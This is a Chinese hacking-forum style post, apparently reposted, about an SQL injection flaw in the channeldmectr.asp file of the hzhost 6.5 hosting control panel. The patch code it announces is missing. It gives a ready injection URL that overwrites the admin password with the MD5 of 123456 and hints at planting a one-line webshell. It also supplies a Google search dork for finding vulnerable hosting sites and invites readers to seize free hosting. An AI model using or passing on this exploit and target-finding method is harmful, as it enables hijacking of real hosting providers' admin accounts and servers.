hzhost6.5 华众虚拟主机管理系统最新SQL漏洞(附漏洞补丁)

这次漏洞出在channeldmectr.asp这个文件上,跟本就没有过滤任何参数. 正好我这里有正版的补丁,打开看下了,打上补丁的channeldmectr.asp文件在第21行到第40行,增加了以下代码:

代码的大概意思是对其中红色部分的参数进行过滤,禁止提交,防止执行构造好的SQL语句. 利用方法如下: http://www.xxx.com/incs/channeldmectr.asp?domainname=1′);{我们构造的语句}– 下面给出一个示范语句: http://www.xxx.com/incs/channeldmectr.asp?domainname=1′);Update [memlst] SET u_pss=’e10adc3949ba59abbe56e057f20f883e’ Where u_nme=’admin’– 语句的意思是将管理员账号admin的密码改为123456. 当然大家也可以灵活运用,构造其他语句,比如写一句话马进去之类的,这里省略. 最后丢个关键词给大家,Google搜索inurl:pdtshw/hstshw会出来大批的使用华众平台的IDC站点..转自www.hacksb.cn 我这个人比较善良,放出独家收藏华众近期出现的所有漏洞的补丁,有需要的朋友可以下载. OK,就介绍到这里,想拿免费空间的淫们现在也可以行动了.. 补丁下载地址(本文为普瑞斯特编辑整理) http://www.hacksb.cn